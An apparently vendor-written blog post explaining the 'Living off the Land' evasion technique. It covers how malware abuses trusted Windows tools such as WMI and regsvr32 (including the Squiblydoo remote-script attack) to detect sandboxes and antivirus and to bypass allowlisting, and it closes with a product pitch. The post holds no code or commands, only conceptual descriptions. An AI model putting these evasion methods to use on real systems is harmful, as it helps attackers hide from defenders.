This is the second of a series of blog posts covering some of the more common evasion techniques used by malware developers. Feel free to visit the first post dealing for what is arguably the most widely used technique—sandbox evasion.
As mentioned in our previous post, modern malware doesn't break out and wreak havoc the moment it lands in your network. Instead, it usually employs a number of techniques in order to remain undetected by various security tools protecting the network.
This post discusses the "Living off the Land" technique.
What is Living off the Land?
Living off the Land, or LotL (or LoL), is an evasion technique that takes advantage of trusted, built-in system utilities, libraries, tools, and components that are native to the operating system (OS). The very nature of these pieces of software dictate that whatever operations they perform will appear legitimate even to the most analytic of security solutions, even if those operations are in fact maliciously performed on behalf of a threat actor.
System utilities, libraries, tools, and components used for Living Off the Land are known as LOL binaries or simply, LOLbins. A few good examples of some of the most widely used LOLbins include Powershell, rundll32.exe, regsvr32.exe, certutil.exe, wmic.exe, and schtasks.exe.
Again, these are trusted software with legitimate functions. So, even if a malware uses LOLbins to, for example, scan the environment for indicators of a virtual machine or sandbox, perform lateral movement, download additional malicious artifacts, trampoline to another stage of an attack, exfiltrate data, and so on, there’s a good chance these actions will be interpreted as part of normal operations and, therefore, won’t trigger alerts.
LotL can also be useful against threat mitigation measures such as application allowlisting or whitelisting, which are designed to mitigate cyberattacks by allowing only trusted files, applications, and packages to run. Because LotL-capable malware operate off of trusted—sometimes even digitally-signed—software, they can easily circumvent application allowlisting and similar countermeasures.
Let’s now discuss a couple of examples of LOLbins and how they’re abused by malware to perform malicious processes and avoid detection.
Abusing WMI for Living Off the Land evasion
WMI, which stands for Windows Management Instrumentation, is not just one LOLbin. WMI is actually a comprehensive set of tools used by system administrators for managing Windows systems, whether locally or remotely. It comes pre-installed in the more recent versions of Windows. It is very powerful, supporting a wide range of actions, including setting security configurations, setting system properties, scheduling processes, and many more. So, if a threat actor somehow manages to abuse this process, you can imagine the possibilities that become available.
Another major function of WMI is querying pertinent information of any WMI-managed component, such as running processes, registry keys, installed services, and file information. So, for example, a malware can query the root\SecurityCenter2 namespace, which includes information from Windows Security Center, to identify what antivirus or security tool is installed on the system.
It can also query the root\cimv2 namespace to obtain matches that indicate the presence of virtual environments such as “VirtualBox” or “VMware”. As discussion in our previous post on sandbox evasion, if a malware discovers signs of a security tool or sandbox, it may opt to remain inactive in order to avoid detection.
Evading application whitelists with the Regsvr32 LOLbin
Another often-abused LOLbin is regsvr32.exe, a digitally-signed Windows utility that is normally used for registering and unregistering DLLs and ActiveX controls in the Windows Registry. Being a trusted utility, files that are executed or module that are loaded via regsvr32 are usually ignored by allowlisting tools and other security solutions.
One particular attack known as Squiblydoo (which is used by several types of malware) takes evasion to another level. The attack abuses Regsvr32's ability to load and run scripts hosted on a remote server. Since the script itself is hosted remotely, the attack is practically fileless and, hence, even stealthier.
Countering LotL with Minerva
Living Off The Land techniques rely on trusted and legitimate system tools that are abused in order to allow threat actors to evade detection. Minerva's Living off the Land Prevention module utilizes patented simulation technology to render these techniques ineffective by contextually hiding LOLbins making it impossible for attackers to find them, let alone utilize them to springboard a malicious attack.